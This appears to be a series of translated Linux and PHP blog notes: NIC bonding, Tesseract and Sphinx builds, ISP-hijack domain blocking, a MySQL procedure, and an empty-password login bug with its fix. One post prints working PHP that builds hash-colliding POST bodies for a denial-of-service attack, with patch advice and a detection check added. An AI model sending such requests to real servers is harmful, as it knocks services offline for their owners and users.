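1. Create the bond0 virtual device
vi /etc/sysconfig/network-scripts/ifcfg-bond0
Enter:
DEVICE=bond0
BOOTPROTO=none
ONBOOT=yes
NETWORK=192.168.1.0    # network segment
NETMASK=255.255.255.0  # netmask
IPADDR=192.168.1.2     # assigned IP
USERCTL=no
GATEWAY=192.168.1.1    # gateway
TYPE=Ethernet
2. Modify the configuration of every physical NIC
vi /etc/sysconfig/network-scripts/ifcfg-eth0
vi /etc/sysconfig/network-scripts/ifcfg-eth1
....
Change the contents to:
DEVICE=eth0  # fill in the corresponding device name here
BOOTPROTO=none
ONBOOT=yes
MASTER=bond0
SLAVE=yes
USERCTL=yes
3. Add bond0 to modprobe
vi /etc/modprobe.conf
Add:
alias bond0 bonding
options bond0 miimon=100 mode=0
4. Add the startup command
vi /etc/rc.d/rc.local
Add:
ifenslave bond0 eth0 eth1
Here eth0 and eth1 are the names of the physical NICs; fill them in according to your actual setup.
5. After the system is rebooted, the load-balancing bond comes up.
Explanation of the options in step 3:
miimon=100
Check the link every 100 milliseconds (i.e. 0.1 second).
mode=0
There are seven modes in total; the commonly used ones are 0 and 1.
mode=0: load-balancing mode. All NICs are used together and the peak throughput is the sum of the bandwidth of all NICs. When one NIC fails, only the bandwidth drops; the other NICs are not affected.
mode=1: hot-standby mode. One NIC is active and the others stand by; when the active NIC fails, another NIC takes over.
Mode descriptions in English: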
mode=1 (active-backup) Active-backup policy: Only one slave in the bond is active. A different slave becomes active if, and only if, the active slave fails. The bond's MAC address is externally visible on only one port (network adapter) to avoid confusing the switch. This mode provides fault tolerance. The primary option affects the behavior of this mode.
mode=2 (balance-xor) XOR policy: Transmit based on [(source MAC address XOR'd with destination MAC address) modulo slave count]. This selects the same slave for each destination MAC address. This mode provides load balancing and fault tolerance.
mode=3 (broadcast) Broadcast policy: transmits everything on all slave interfaces. This mode provides fault tolerance.
mode=4 (802.3ad) IEEE 802.3ad Dynamic link aggregation.
mode=5 (balance-tlb) Adaptive transmit load balancing: channel bonding that does not require any special switch support. The outgoing traffic is distributed according to the current load (computed relative to the speed) on each slave. Incoming traffic is received by the current slave. If the receiving slave fails, another slave takes over the MAC address of the failed receiving slave. Prerequisite: Ethtool support in the base drivers for retrieving the speed of each slave.
mode=6 (balance-alb) Adaptive load balancing: includes balance-tlb plus receive load balancing (rlb) for IPv4 traffic, and does not require any special switch support. The receive load balancing is achieved by ARP negotiation. The bonding driver intercepts the ARP Replies sent by the local system on their way out and overwrites the source hardware address with the unique hardware address of one of the slaves in the bond such that different peers use different hardware addresses for the server.
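Check the status of bond0:
cat /proc/net/bonding/bond0
If a NIC shows MII Status=down, that NIC cannot reach the network.
In that case, check:
1. Whether the network cable is plugged in properly
2. Whether the network cable is damaged
3. Whether the NIC configuration is correct
4. Whether the NIC is seated properly
5. Whether the NIC is damaged
PS: When using bond, every NIC interface must be cabled to the switch and router.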
Downloads:
1. Source package: Tesseract-3.01.tar.gz
2. Language pack: Eng.traineddata.gz (this is the English language pack)
3. Image analysis library: Leptonica-1.68.tar.gz (version must be >= 1.67)
Ubuntu:
sudo apt-get install autoconf automake libtool
sudo apt-get install libpng12-dev
sudo apt-get install libjpeg62-dev
sudo apt-get install libtiff4-dev
sudo apt-get install zlib1g-dev
CentOS:
yum install gcc gcc-c++ autoconf automake libtool libpng libjpeg libtiff zlib-devel
Extract Leptonica-1.68.tar.gz and enter the directory:
./configure && make && make install
ln -s /usr/local/lib/liblept.* /usr/lib/
ln -s /usr/local/lib/liblept.* /usr/lib32/
ln -s /usr/local/lib/liblept.* /usr/lib64/
ln -s /usr/local/lib/liblept.* /lib/
ln -s /usr/local/lib/liblept.* /lib32/
ln -s /usr/local/lib/liblept.* /lib64/
Extract Tesseract-3.01.tar.gz and enter the directory.
Delete the first character of the first line of ccutil/strngs.h.
Then run the following:
sh autogen.sh
CPPFLAGS="-I/usr/local/include" LDFLAGS="-L/usr/local/lib" ./configure
make && make install
ln -s /usr/local/lib/libtesseract.* /usr/lib/
ln -s /usr/local/lib/libtesseract.* /usr/lib32/
ln -s /usr/local/lib/libtesseract.* /usr/lib64/
ln -s /usr/local/lib/libtesseract.* /lib/
ln -s /usr/local/lib/libtesseract.* /lib32/
ln -s /usr/local/lib/libtesseract.* /lib64/
Extract Eng.traineddata.gz and copy it to the /usr/local/share/tessdata/ directory:
gzip -d eng.traineddata.gz
cp eng.traineddata /usr/local/share/tessdata/
End.
PS: It easily misreads digits as letters, e.g. digit 2 = letter Z, digit 0 = letter o, and so on.
This bug is described in the article at http://www.laruence.com/2011/12/29/2412.html
Original advisory: http://www.ocert.org/advisories/ocert-2011-003.html
It takes down the vast majority of dynamic languages: a single ordinary PC is enough to run N high-spec servers into the ground.
Hash DDOS sample code:
$size = pow(2, 14); // 16 is just an example, could also be 15 or 17
$genpost = "";
$len = 0;
$array = array();
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $genpost .= ($genpost ? "&" : "").$key."=1";
}
$len = strlen($genpost);
$data = "POST <file path> HTTP/1.1
Host: <domain or IP>
Content-Type: application/x-www-form-urlencoded
Content-Length: {$len}
Connection: Close

".$genpost;
Just keep POSTing the value of $data to the target URL and the target server's CPU will spike until it goes down…
PHP 5.2 can apply this patch:
https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars
PHP 5.3 must be upgraded to 5.3.9; otherwise the only option is to port the 5.2 patch yourself.
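For spotting this request shape at a proxy or in captured request bodies, the check below is an added example and not code from the original post, the linked patch or PHP itself. The function name inspectFormBody, the default limit of 1000 and the sample bodies are assumptions made for illustration; the bucket rule in the comment is an assumption about PHP 5's hash table, and PHP fills $_POST before any script code runs, so a check like this belongs in front of PHP rather than inside the application.

```php
<?php
// Added example: inspects a raw urlencoded body for the two signs of the
// request above: a very large field count, and integer keys that all land
// in the same hash bucket.
function inspectFormBody($rawBody, $maxVars = 1000)
{
    $fields = ($rawBody === '') ? 0 : substr_count($rawBody, '&') + 1;

    // Assumption: PHP 5 stores integer key k in bucket (k & (tableSize - 1)),
    // where tableSize is the next power of two >= the element count.
    $tableSize = 1;
    while ($tableSize < $fields) {
        $tableSize <<= 1;
    }

    // Examine at most $maxVars pairs so the check itself stays cheap.
    $pairs = ($rawBody === '') ? array() : explode('&', $rawBody, $maxVars + 1);
    $pairs = array_slice($pairs, 0, $maxVars);

    $buckets = array();
    foreach ($pairs as $pair) {
        list($key) = explode('=', $pair, 2);
        $key = urldecode($key);
        // Only canonical decimal strings become integer keys; 18 digits
        // still fits a 64-bit integer.
        if (preg_match('/^(0|[1-9][0-9]{0,17})$/', $key)) {
            $bucket = ((int) $key) & ($tableSize - 1);
            $buckets[$bucket] = isset($buckets[$bucket]) ? $buckets[$bucket] + 1 : 1;
        }
    }

    return array(
        'fields'         => $fields,
        'over_limit'     => $fields > $maxVars,
        'largest_bucket' => $buckets ? max($buckets) : 0,
    );
}

// Constructed sample bodies (illustrative only).
$benign  = 'user=alice&page=2&id=17';
$crafted = '0=1&8=1&16=1&24=1&32=1&40=1&48=1&56=1'; // every key is a multiple of 8

print_r(inspectFormBody($benign));
print_r(inspectFormBody($crafted));
```

A body whose largest_bucket is close to its field count, or whose over_limit flag is set, is worth rejecting or logging before it reaches an unpatched PHP.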
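I wanted sphinx to split a single table's data into several indexes to improve multi-core performance.
That requires computing the minimum and maximum ID of part X of N of a table, so I learned a little about MySQL stored procedures.
Here is the SQL that implements it:
DELIMITER //
CREATE PROCEDURE `sph_distribute`(IN `tabname` VARCHAR(50), IN `idname` VARCHAR(50), IN `num` INT, IN `pos` INT)
BEGIN
    -- Rows per part
    SET @SQL = CONCAT('SELECT CEIL(COUNT(*)/', num, ')+0 INTO @step FROM `', tabname, '`');
    PREPARE stmt1 FROM @SQL;
    EXECUTE stmt1;
    DEALLOCATE PREPARE stmt1;
    -- Smallest ID of the requested part
    SET @SQL = CONCAT('SELECT `', idname, '` INTO @minid FROM `', tabname, '` ORDER BY `', idname, '` ASC LIMIT ', FLOOR((pos - 1) * @step), ',1');
    PREPARE stmt1 FROM @SQL;
    EXECUTE stmt1;
    DEALLOCATE PREPARE stmt1;
    -- Largest ID of the requested part; the last part runs to MAX(id)
    IF pos = num THEN
        SET @SQL = CONCAT('SELECT MAX(`', idname, '`) INTO @maxid FROM `', tabname, '`');
        PREPARE stmt1 FROM @SQL;
        EXECUTE stmt1;
        DEALLOCATE PREPARE stmt1;
    ELSE
        SET @SQL = CONCAT('SELECT `', idname, '` INTO @maxid FROM `', tabname, '` ORDER BY `', idname, '` ASC LIMIT ', FLOOR(pos * @step - 1), ',1');
        PREPARE stmt1 FROM @SQL;
        EXECUTE stmt1;
        DEALLOCATE PREPARE stmt1;
    END IF;
    SELECT @minid, @maxid, @step;
END;//
DELIMITER ;
Call:
CALL sph_distribute('table name', 'id column name', number of parts, which part);
Example:
CALL sph_distribute('table', 'id', 5, 3);
Some less common MySQL constructs:
1. DELIMITER, used to define the SQL statement terminator;
2. SELECT …… \G, which displays each field on its own line;
3. Inside a PROCEDURE, a variable used as a table name can only be handled with PREPARE, and the variables assigned inside it can only be global variables (i.e. @var)
4. Multiplying integer variables automatically converts the result to floating point, which really annoys me; FLOOR can be used to turn it back into an integer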
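Today I was happily debugging a production project, clicked an internal site link, and suddenly got redirected to 114search.114so.cn!!!
Furious!!! Hijacked again by that thug, Telecom!!!
On top of that, Chrome cached the 301 header, so this link kept going to 114so.cn
I ran into the same nonsense when visiting news.ifeng.com
So I quickly added the 114 domains and their IPs to the router blacklist; being a bit ruthless, I blocked whole network segments
Below are the 114so.cn domains and IPs I have blocked; I will update the list when I find the time: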
114.sh.vnet.cn sh.vnet.cn sh.114so.cn search.114.vnet.cn 114.vnet.cn 114.search.tfol.com 114search.114so.cn 114so.cn 118114.cn keyword.vnet.cn keyword.vnet.cn vnet.cn 114.vnet.cn 61.139.8.100 218.30.64.193 - 218.30.64.199 220.165.8.172 116.228.55.33
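The "sh" in the first three domains is the pinyin initials of Shanghai; replace it with the matching letters for other places
This method is not a complete defence, only a passive one: block each one as it is discovered
The thorough way is to use a safe public DNS abroad, for example Google's: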
8.8.8.8 8.8.4.4
But the downside is that some sites that use a CDN or multiple IPs become very slow to access!!!
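While adding the merchant member feature for 购谷, I suddenly found a very serious bug: an account can be logged into with an empty password!!!
When designing the member module, I used the member designs of a1.cn and ucenter as a reference and designed
public function getUid($uid, $passwd = null) {
    ........
    if(is_string($passwd)) {
        /* check the password */
        ........
    }
    ........
}
The getUid method is called to decide whether the account and password match
But!!!
if(is_string($passwd))
This check is a hidden danger!
When the programmer writing the business logic calls getUid without converting the $passwd parameter to a string, the result is:
By deliberately constructing the login parameters, passing only username and no password parameter, one can log in to the corresponding account!
Fix:
if(func_num_args() == 2)
PS: This bug affects both the admin backend and member login; if someone exploited it, it would be very serious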
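The check described above, shown next to the post's fix as an added example that is not the project's own code. The class MemberStore, the method names getUidVulnerable and getUidFixed, the in-memory user data and the use of password_hash/password_verify are all assumptions made for illustration.

```php
<?php
// Added example; names and data are constructed, not taken from the project.
class MemberStore
{
    private $hashes;

    public function __construct()
    {
        // Constructed user record standing in for the real member table.
        $this->hashes = array('alice' => password_hash('correct horse', PASSWORD_DEFAULT));
    }

    // Shape described in the post: verification only happens for string input.
    public function getUidVulnerable($user, $passwd = null)
    {
        if (!isset($this->hashes[$user])) {
            return false;
        }
        if (is_string($passwd) && !password_verify($passwd, $this->hashes[$user])) {
            return false;
        }
        return $user;
    }

    // The post's fix: verify whenever a second argument was supplied,
    // whatever its type, so a null from a missing field fails the check.
    public function getUidFixed($user, $passwd = null)
    {
        if (!isset($this->hashes[$user])) {
            return false;
        }
        if (func_num_args() == 2
            && !(is_string($passwd) && password_verify($passwd, $this->hashes[$user]))) {
            return false;
        }
        return $user;
    }
}

// Constructed login request that carries a username but no password field.
$post   = array('username' => 'alice');
$passwd = isset($post['password']) ? $post['password'] : null;

$store = new MemberStore();
var_dump($store->getUidVulnerable($post['username'], $passwd)); // password check skipped
var_dump($store->getUidFixed($post['username'], $passwd));      // password check enforced
var_dump($store->getUidFixed($post['username'], 'correct horse'));
```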
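In use, I found the cloud disk I/O to be utter garbage
Two cloud disks, one 300G and one 200G
Copying a 10G tar, peak values (the low values are only a dozen or so KB):
300G: read 10m/s, write 4m/s
200G: read 4m/s, write 1m/s
What on earth is this?
The 200G one writes slower than my broadband….
The I/O performance of the disk that comes with the purchased cloud host is still acceptable:
read 100m/s, write 30m/s
PS: The cloud disk is only good for attachments that never change all year; I can't imagine how laggy a database would be on this kind of I/O… a meaningless "secure" cloud disk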
ln -s /usr/local/lib/libiconv.so.2 /usr/lib/libiconv.so.2
If you are on a 64-bit system, you also need to link it into lib64
ln -s /usr/local/lib/libiconv.so.2 /usr/lib64/libiconv.so.2
First:
./configure --prefix=/usr/local/sphinx/
Open /src/Makefile in the source directory:
LIBS = -ldl -lm -lz -lexpat -L/usr/local/lib -lrt -lpthread
Append -liconv to the end:
LIBS = -ldl -lm -lz -lexpat -L/usr/local/lib -lrt -lpthread -liconv
Finally run make:
make && make install
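PS: While helping koofind switch servers, the project required renaming the SphinxClient class, but that produced some warnings; in the end I found that the constructor is named SphinxClient. Annoying; it is probably for PHP 4 compatibility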
wget http://ftp.gnu.org/pub/gnu/glibc/glibc-2.7.tar.gz
tar zxvf glibc-2.7.tar.gz
# Do not build inside the glibc-2.7 directory; prefix=/usr must be set
./glibc-2.7/configure --prefix=/usr
make && make install
